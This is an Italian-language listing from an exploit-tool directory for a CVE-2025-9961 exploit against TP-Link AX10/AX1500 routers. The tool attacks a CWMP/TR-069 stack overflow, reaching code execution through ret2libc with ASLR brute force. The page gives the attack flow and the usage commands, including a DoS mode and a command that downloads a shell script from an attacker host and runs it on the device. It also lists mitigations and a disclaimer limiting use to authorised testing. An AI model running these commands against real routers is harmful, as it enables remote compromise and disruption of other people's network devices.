Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-9961 — Exploit per overflow del buffer dello stack su TP-Link AX10/AX1500 in CWMP (TR-069) che consente l'esecuzione remota di codice tramite ret2libc con bypass ASLR. Include modalità di solo controllo, DoS ed esecuzione di comandi. | Kitploit
Strumenti/GitHubGitHub/yt2w/cve-2025-9961
Sicurezza Sistemi EmbeddedSicurezza IoTAnalisi delle VulnerabilitàExploitPenetration TestingSicurezza HardwareStrumento di Accesso RemotoBinary Exploitation
GitHubyt2w/cve-2025-9961

CVE-2025-9961

Exploit per overflow del buffer dello stack su TP-Link AX10/AX1500 in CWMP (TR-069) che consente l'esecuzione remota di codice tramite ret2libc con bypass ASLR. Include modalità di solo controllo, DoS ed esecuzione di comandi.

617 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

CVE-2025-9961

TP-Link AX10/AX1500 CWMP Buffer Overflow RCE

Panoramica

Stack-based buffer overflow in CWMP (TR-069) che porta all'esecuzione remota di codice.

CampoValore
ProdottoTP-Link AX10, AX1500
AffettoAX10 < 1.2.1, AX1500 < 1.3.11
CVSS8.6 (Alta)
TipoStack Buffer Overflow
VettoreCWMP/TR-069 (porta 7547)
ImpattoEsecuzione Remota di Codice

Flusso di Attacco

root@kitploit:~
flowchart LR
    A[Attacker] --> B["Malicious ACS"]
    B --> C["SetParameterValues"]
    C --> D["Stack Overflow"]
    D --> E["Overwrite PC"]
    E --> F["ret2libc"]
    F --> G["system()"]
    G --> H["RCE"]

Dettagli Tecnici

La vulnerabilità è nel processo cwmp che gestisce le richieste SOAP SetParameterValues. L'input viene utilizzato per calcolare la dimensione del buffer senza controlli sui limiti.

Sfruttamento:

  • Usa ret2libc per chiamare system()
  • Bypass di ASLR tramite forza bruta
  • I riavvii del servizio permettono tentativi ripetuti

Utilizzo

root@kitploit:~
python exploit.py <target_ip> --check-only

python exploit.py 192.168.0.1 --dos

python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"

Parametri

Requisiti

Nessuno (usa la libreria standard)

Mitigazione

  • Aggiornare al firmware corretto
  • Disabilitare TR-069/CWMP
  • Limitare l'accesso alla porta 7547

Dichiarazione di non responsabilità

Solo per test di sicurezza autorizzati.

Scarica lo strumento
FlagDescrizionePredefinito
-p, --portPorta CWMP7547
-c, --commandComando per RCEnessuno
-t, --timeoutTimeout del socket10
--dosSolo modalità DoSdisattivato
--check-onlyVerifica se vulnerabiledisattivato